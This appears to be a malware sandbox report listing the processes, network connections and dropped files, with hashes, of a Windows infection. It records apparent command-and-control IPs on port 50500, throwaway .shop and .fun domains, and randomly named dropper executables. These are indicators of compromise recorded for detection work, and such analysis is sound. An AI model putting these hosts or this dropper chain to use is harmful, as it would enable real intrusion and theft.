C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.8.548551733\852648684" -childID 7 -isForBrowser -prefsHandle 5280 -prefMapHandle 5504 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc3f0be8-1d6b-42f1-a229-8bf7ccaabd4b} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5508 1b8be35f458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.7.11885308\1485962313" -childID 6 -isForBrowser -prefsHandle 2884 -prefMapHandle 3384 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2693e2-3ea0-431c-9a9a-23343d9971dc} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5280 1b8be360f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.6.1702852335\1337804002" -childID 5 -isForBrowser -prefsHandle 4668 -prefMapHandle 5272 -prefsLen 26381 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {342d548a-ad4b-4791-9a34-c178dcae7059} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 3436 1b8be35f158 tab

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

"C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe"

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

"C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\7B06.exe

C:\Users\Admin\AppData\Local\Temp\7B06.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\heidiZzOs_nAUVEVs\tgDCkeEhpafr5oQRSOwS.exe

"C:\Users\Admin\AppData\Local\Temp\heidiZzOs_nAUVEVs\tgDCkeEhpafr5oQRSOwS.exe"

Network

US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 241.144.24.52.in-addr.arpa udp
NL 173.194.79.84:443 accounts.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 135.148.100.90:443 tcp
SE 81.230.245.67:444 tcp
RU 193.233.132.62:50500 tcp
GB 142.250.180.22:443 i.ytimg.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
FR 157.240.196.35:443 www.facebook.com tcp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
NL 173.194.79.84:443 accounts.google.com tcp
GB 172.217.169.14:443 youtube-ui.l.google.com udp
NL 173.194.79.84:443 accounts.google.com udp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
GB 142.250.180.22:443 i.ytimg.com tcp
FR 157.240.196.35:443 www.facebook.com udp
US 8.8.8.8:53 67.245.230.81.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.196.240.157.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
GB 163.70.147.23:443 static.xx.fbcdn.net udp
RU 193.233.132.67:50500 tcp
RU 193.233.132.62:50500 tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 www3.l.google.com udp
GB 172.217.16.238:443 www3.l.google.com udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
NL 173.194.79.84:443 accounts.google.com tcp
NL 173.194.79.84:443 accounts.google.com udp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 188.114.96.2:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 172.67.180.132:443 technologyenterdo.shop tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 132.180.67.172.in-addr.arpa udp
RU 193.233.132.49:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 problemregardybuiwo.fun udp
CA 37.120.237.196:50500 tcp
US 8.8.8.8:53 detectordiscusser.shop udp
US 172.67.195.126:443 detectordiscusser.shop tcp
US 8.8.8.8:53 126.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 188.114.97.2:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
US 8.8.8.8:53 242.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 scontent-lhr6-1.xx.fbcdn.net udp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 trmpc.com udp
UZ 195.158.3.162:80 trmpc.com tcp
US 8.8.8.8:53 162.3.158.195.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
RU 193.233.132.49:53 90.128.172.185.in-addr.arpa udp

Files

memory/2136-0-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-1-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-2-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-4-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-3-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-5-0x00007FFC80030000-0x00007FFC80031000-memory.dmp

memory/2136-6-0x00007FFC90830000-0x00007FFC908EE000-memory.dmp

memory/2136-7-0x00007FFC80000000-0x00007FFC80002000-memory.dmp

memory/2136-8-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-9-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-10-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-11-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-12-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/2136-13-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-21-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-22-0x00007FFC91C50000-0x00007FFC91E45000-memory.dmp

C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe

MD5 852f8672ad668dbef934f55b4d098973
SHA1 75713a5a598e5eccb863f6670ff4e5738058a64e
SHA256 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428
SHA512 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 d4dd3514cd270a040af7c1ef059606ff
SHA1 8c54f1de630043d22490853d93d0d237aae51db7
SHA256 a7cbec7bca69337408e138812f335d87e1b4ff900e31a05bb42619c6372e058a
SHA512 6335dec8466a4ac443f0c52cb8534e8282344280af488488b282672bd304657629138cd952201b7533b1876399fc3b61d6fd2732399d8ff246cea3018d6bb8c6

C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe

MD5 3f3a4b743aed6db292b3eb9601c93d94
SHA1 4cc5b29cc65cb7fa17bec2fd3073d943f76a5492
SHA256 13b2db71adabd1f7ca1ec14d4a623b1cdf5250b1f6e725ad26a393b60dbe907b
SHA512 f1dea75532c9d38cf4b05f2c90b77c7ac4a57bbdd979306b82eea82ab35154a6a6a7ffbd9e1b0e45b68c3f7a946fb3c43c5f0023859a484890529cdeb7451c00

C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe

MD5 43abfd80cbfe8afaa65961856640efc4
SHA1 71614b90bb167b289d6d01d3768727eb6ac61ec5
SHA256 f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691
SHA512 bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

MD5 af3cf8176e32d7370b12331171306fc2
SHA1 c71996150ba87ffb274936366e557b77bb7baba0
SHA256 aaa196b4e73bd2601bc2db3d5d04f24bad3f037e0237565ea3e6222c84c441b3
SHA512 232b38bbd08f6e89f3cf3be90f85e9f4bf63735b744e2988f9e54ef9ae6d926482e1153f13aa603a6be7197a4548ec0ed2fb3dc99b8872410b7d79a5bba954ff

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

MD5 5b9b1de05903cf2187c6f97810d0279e
SHA1 798e1af4147a9aeac88348baef1db6091f9b72f6
SHA256 0496f898a723997a061b9779a07c4900dfb85e697fb8c524214f87620edf9823
SHA512 03345dc02790b8b2f7d97fda93b2e35aba2ddb184267a1bc1e6b721088caa5954b5d7a5674d4f02f3fcb107a3dff5a0eb04219f14e4733cf97fb69813b2f814d

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

MD5 a2cd0ee55ac61c65ad6d4be2ef602c18
SHA1 d96591ad585284c13d277d578851ab6293d44310
SHA256 b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7
SHA512 bfee5ab8e75ad1edd98a13bf456da9ccead22c40a518ceacf90f259026cdfc938b7da6003bc4fb79e22720b46d74b308b76fda65f638217af4148984f2aa97ec

C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe

MD5 e654823683cb9be41044f5a800be69fd
SHA1 d43214c03a47f3b0c77a82eca775d702eaa025e8
SHA256 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85
SHA512 d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 631393c67cb220cf18796dec2314c118
SHA1 751638c8a1b070b354231a2fd4283f02f303ca94
SHA256 e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600
SHA512 b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6

C:\Users\Admin\Documents\GuardFox\qdUD6vBsa4fF5MCF7Bn6PjqC.exe

MD5 9596858a78a4aaedaf4deb584b041a93
SHA1 6debe91bd16e527e7cda7833f2548a4e3ec014b7
SHA256 4a38c79d796ad7ac91e0e9159fd7b32a5946cbfb32d06891d4195b428bb1620b
SHA512 7b87586ab753467bcd715cdf30fe1cee0ef53036c35ba918e795b56c97ad9b51ddac905e7629cba08e2441c6f067970eead3d42f95a607bcad35aa0a93d71a44

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 10a75c1a4d265c762a6e9a63b406fa9c
SHA1 b4898ade35c9afa5ae04c7653fe790d1761349fa
SHA256 1dfa064545fa4eb9168660adb49a640cfb4c79c647adabc4d5a58daa96684946
SHA512 3ba2896a739036d86ac6651b713e2205b996554f24eda6b90a25965adea4f62b710d965ad4fb72b2352df93a2fa98affd6501b35b6604f390390c96af4e278d3

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

MD5 8d63cffe06f138cd0f161025e8aa5dcc
SHA1 a616295743cb9f16eaddda57ecaaaec1c41d7baa
SHA256 04a4efc3610be9f32cebdf236fe89ec02944cc28e56a83455d90fc9ef0337cea
SHA512 c8ba2946816b10dd4ba8a1a2eed35c111bd95c3fac6d277b580a1d50038f4c7447f0c3bb0d0eddde67e182cc2ba90b047cd2ba07a89b0ac3488718fbb8155523

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 3b770d98fb0fa9a539471b1452feac0a
SHA1 15c980534a54ce404ad256cf30f534bc58775b69
SHA256 0c6390cf9f0519731b9a39ab40e8ac7c495d7737c3d6648c617f402473a179eb
SHA512 28d930477503145586bae522ea41f6c6b17d75778cc455f94120e7769d5dd5229dec8a005daa5e21ca9441c82615c144419b4c9624a1c0b26b8bc002ca8039a5

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 031473e31a490fd735305083cbdf81c8
SHA1 4382984616826d999456d79c30152fcfba8b0abc
SHA256 b9a1cbbc5af9327c6852ba98985c3282652160f040f33392d856a4173365a631
SHA512 5804d2b90eda3e9efb9f5d394eb2277bedaf14fefc447174330b71eb3bd126d25a26b431b0c7cf994af6e92af73e047c98ebc1a02814bef907e7ef7a2d9da6e8

C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe

MD5 2117899a2ae435139133075f560e2ae2
SHA1 17e212a4d9e9029cd65493ce4512df152f0f52da
SHA256 6c06f528548ea45c6080a37373ce9051592998b0943ddea3e41f020be225d6af
SHA512 7252bbad94df230a8a761a93d16cfadbe5ffe5c15b6bf0abefe86161b11458f729aa01eb94fec6ee6f28ea2e3032f573286ead7748e4f4640c9dd1938c158ff5

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 5865dc9aee095d83cd9e895512ff5cbd
SHA1 63971c17b52bdc948eb5c5f71ad5d55af105660b
SHA256 9af8347f68f0745b6cd5b223cb4ccbd6924fc02da744928d54eb079efaa0aae3
SHA512 fa95461f58520ca43a1a0e19e1bb133258e2b36bb4d3beede2350f0ffa671c543869a9dbf316a9f5249452047419b1a2e74fbb401c3602545272f87096aeb75d

C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe

MD5 cadf3a652abcf29e5696a961f0c8722c
SHA1 8a8f03874a314e11cc8463a068934357ce37c1a3
SHA256 b1aa828f1cca97ee2d691473bd37acc92f89b0bc971020b836aaa432ebeb9f5c
SHA512 08628dcf11ce9f3a3cf2ee7b48679b08ed6563bb13e657cf2dae932cd104cc4b1a21b233626998195f7663660f9f04f485a0064e179a09488d67f8e0f7e7e0db

memory/2136-173-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe

MD5 aea679a1da357e0ae130e352ad6663ea
SHA1 e283a3144fff6b59f7751daccf5b4dc8acfa3ac2
SHA256 6dfc163a2ba56992e74d15cb4d50bfc2cb0cc9ab23114f08542d80770b33eb8d
SHA512 0874b0d53c0a032dc732e014d972f6912b0506f8a02f0f97baa40bf5da922b99b8af59b6bdabd098f9d88835b287a71404a318ad3e5c0cf2c5e89360a52e4704

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

MD5 1e73221a5533c52e9c0d7aabfedbb606
SHA1 d3760a24067e624a1dd8bbcf8e477564a56c52b3
SHA256 9f086d26e34fb1a68def7748203692c0089570a2c93868083b26e4bd5b9d6ca3
SHA512 81df6b67f92b6e0c460dac5d2cbbed1b4e105d6ba9fdeffd9edb7cd1bc6f0b0c82f1095bd91bd9f7bfcfa26a7f15e7aef7a8135599cd7a456ccd0584fdd2c3c2

memory/2136-411-0x00007FFC80010000-0x00007FFC80011000-memory.dmp

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 e02cfc4f71fe8d091f308df8e4d4347c
SHA1 4a689fc5c2eda63562d685cc683c84f84de55f31
SHA256 ee716d6300b1faf812bf2bfa685339e8d582f20cc3bfed68170bbb539e9abf1f
SHA512 82de5e1c0657b08a7b5bebf69aed5da63d59c55eb7667662558068e03fadb2d3e1b8d183c6416d2453749a97a0b0563f1be220d97f288661df95e4c28ba19715

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 c1cd28fec4dd4be627036cc8cc6925fd
SHA1 187ad7a23fae77fa2ceb98b379cfbc90677c80c6
SHA256 11749a7388f8c9c1123281b99c7c82a3e5df6c3dd46ecba563498b2089c0a307
SHA512 392d49aa65a695ef968e45c070aed963dca3649344fe3d561e46dd11824834ca4b1d9a1c0229b7be0435c2bbf9806fab6ba3b6c16064d30e62b5e611f1cef6d9

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

MD5 5b022efe18c209f43ea1016914f13742
SHA1 4ae70848fc4cc06b17879cb2f2d85a38e03ca4f6
SHA256 a01cef2df9c1c35bb0962b0df8d53fd6ac206ea0351e3f3e1bc71660a05bf08f
SHA512 a9b13131a393d09a7feb3bc5fb6b0b8d348d2a2ca932af29b3c4ccde7a843474889e89074097cc8a5b6b58a014d0c37ead03b10dd90671a777a999961946e843

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 4d1a7fa8b25aa1b80b9bf328c70f7439
SHA1 85ef029f03d38cc50c68bdc6d2a557e017c0ea83
SHA256 08b58e4ba2809f6103644477eae39ab14ae5b9eb32a9b7956449e960208e3cfd
SHA512 c8c34306299c81fdd819f3182cc3f373c84b7268947378f9c1b0f4b193db42e412b959b368b2373e2f74ee535d48fa9b714f68aa394cd99d5b1cb33d7e88d9a2

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 8b64f6f3fc130fec52d3cc2af51e5c83
SHA1 817984c213602c18551b50bf858e17efe3ee225a
SHA256 5b6cf1cc98c8fde91d35ceaabc48e0a9587400ed6c3eecd106a43b2d5798f983
SHA512 04e67dfc33281c43c9687aa3deb3f9c0dfbd385f3c922f81e9741066463598d812238ea4c259840662abbd7c176ba4001d357f292ec1fd9ea5d4253714718493

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

MD5 a3c50d1f9b80c77ad895091b6e09d2ae
SHA1 46a333b26f1590466509c9da322a1e1aa8d63855
SHA256 22282798185305c4385d84cffa720668846caed239ab0dfd7a10e3e5066faa46
SHA512 ee68b9a094f7a024f0856b3377de2c5b1095366896e66e803a40a7dccd6eb142e986db47eb64d8ae7791d43459c337ecc08d0a07290a7fcb02cd815871f4d8aa

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 0f8ce9430bc1c20bdfad650561e09b93
SHA1 78d44519efad5244da9770a64860eabf20701cc9
SHA256 881d807ceb5563e809cfb5920d1368180417c73940c35d0881d7033c8eb8c7d1
SHA512 78d7b11ba9f190f103dcfa54f136acb208f9b18bf756eefd788bc42ab6a2627b2cf183eb240ece76aab90da49ad977de90a57ba97d7acf06652cbb2772b394a0

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 c6bc17d04af45969068014c711781639
SHA1 6d6fdda2a681dd93a7da3bad26b70c2d1fe5a668
SHA256 766c4a1449e527e1ab7e85ceb70c0517d66d665d520c870878a16493a72a4a25
SHA512 f9ac50c8a561147abb7da38901cc08b6d9fd42943d15655712945ee0a4e767e0029a0536b08634010014a0d30a3a2e221bb3c9417a0c5e85630ec48883345492

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 0cb6593f620acc57ffcba8c27ef072f4
SHA1 ae832ff96d6ec22d43c4cac08bb42626271ad34f
SHA256 28b7439d48cd5fa2365f2aa69a69d88f4b2d0b445d9b0d004ee62a466b8216ec
SHA512 180b796faa1397c7f26df7340ccde58224fe70bd6f5822621053513a3d462dc3b6801974b4a5b8548d2bef4de63b50c6b8f82e2ed91a28f10da136a6d96b47f9

memory/5632-610-0x0000000000BF0000-0x00000000011A7000-memory.dmp

memory/5736-616-0x0000000004960000-0x0000000004994000-memory.dmp

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 88f23a34516b0333862eb84e364feb94
SHA1 562f52608a075400ba64dc98202aaf5924941d7a
SHA256 136ac1452a135b26c282a1527d4a239a80c272edcbb7ae1a1887f3d4779d14c1
SHA512 3f33c5ffdcf32bd1836ce5d415ca37ab11de5726b070db1d98a1bdfc4d015f06b9ef2ea3c4857bf76190917d14317bc5e9a72bd65b4cc36309c73be0900acc6a

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 a12364f305592a93bcc7d3b2710c8cd2
SHA1 32a6e38c0fb78245dea4a86cbc62ee25ffac982b
SHA256 c7bf5802880ac420a89c2c8286c2901005c251567f70609d9c2e52eb08f0ba24
SHA512 4791b461a17361ec0062427603241a5c3e1e74578b67a741ebf51bcdd784ff2d22a7a31fd618204cdbfb1e449fa5881a1c4ae5c7801a949f75ab15ba386c4598

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

MD5 5870b42b93eef6c36b9cf6956865b5d8
SHA1 97080728b5c43cfa1909422dd9706803b447ffa3
SHA256 78028a1a73d3c6ad6cd87dedf4689bb1c5716784bdd292dbcab9771ad8ca6d50
SHA512 5f7d38d942334c0b55f34d3a1914c69d46146c9fc8bc71c6aaec1e3c12891ee16bcf74405f24c56d985f97de15aa81b623f1859907a971b6df3929ab0be0a69f

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 76a095c622351abd8398c0ff8ac9fd0d
SHA1 fa0c305d6fccbcd1dbba1dfb62f31ac14fc118c5
SHA256 770c93aafd22f447fb2e30ac2719176447d6359ecb082b2e39541ece563340d4
SHA512 4c624415deb8922bb5f660d2ea555aa6bcf1e9fcfd91776af288ec9599ce6bce5010f21fb0f62011aa1a46f12bc3bb42e812d579d4ca9e13f18c7cd520005b24

C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp

MD5 1756d6fc7bf4213c8f0a521cd42d0ac6
SHA1 871962e45061751468d940000ee536794c269532
SHA256 c4b71ffb200f4b41f95b23aa3a2b90e6f87e5cd7ca4a9234e33ed441dcde7594
SHA512 694a8b76ffd5a1b78d63b628680e8997dbc0f06c4524804cd9da4e4d015c586c5a9145190a6dc44464592ac717df83ccce53401d68cd48703f932c6340e192ad

memory/5736-700-0x0000000000400000-0x0000000002D3F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MHR0A.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/6140-731-0x000000000201E000-0x00000000020B0000-memory.dmp

memory/4376-773-0x0000000000140000-0x0000000000386000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\python311.dll

MD5 145a16e3912bf0785b77b5648b09452b
SHA1 3dadfe65a95c01fc69052dd1375f5b7054d18531
SHA256 f8b67124cf483e32a4d689f956ab943156f9ac4ad37275ece7747f1c854fc831
SHA512 57657e17de12940410b90bf1c1587960cf10df0d5f7e655f011dbdba7e28f94a6b81bfddced8dc103f483e14f42b1d7cd1c66320010a02b8b2473c3f72a9da42

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\WW9_64.exe

MD5 9bd3ca4b28a05d2d9feb9d84bf01d8c9
SHA1 367b52d3cafdfd3fd9ce89873f48e72d751dfab0
SHA256 400d1351050c3208f78f852baec287756286dc48ca1d71024b3e662338f3f4d5
SHA512 ce6fd0c6285eb9323fc8e94302f22b3bc64538c8aa033b984ac4cc5cb99a1364a2a8f5b687c481d3fe2eb117410ba02dc4d9abad980d17c7e217675c2ca4a32e

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/5608-793-0x0000000000400000-0x00000000007A1000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 5d4a3b2536c7939678743311e96be237
SHA1 e71b7421b84b3b3b7fd61d962a8e64101df4791d
SHA256 41d6d187c96ef8e8536e1ab6f127a4afd677823d14feab9aa837707d8857f1e4
SHA512 b3b28bec0f137a752cb451f0704a133a5599867d009320cb333f5539743ababab2ab596f5fc70f2e4fa036e66206821dfd35f322a26da51d88a6897c6916273f

memory/5608-801-0x0000000000400000-0x00000000007A1000-memory.dmp

memory/2136-799-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/5632-810-0x0000000000BF0000-0x00000000011A7000-memory.dmp

memory/1448-811-0x00000000072B0000-0x000000000758C000-memory.dmp

memory/6108-809-0x0000000000490000-0x0000000001213000-memory.dmp

memory/6132-818-0x00000000010B0000-0x00000000010B1000-memory.dmp

memory/6132-820-0x00000000010E0000-0x00000000010E1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 088fd337c5dd20af88887c935787b5b3
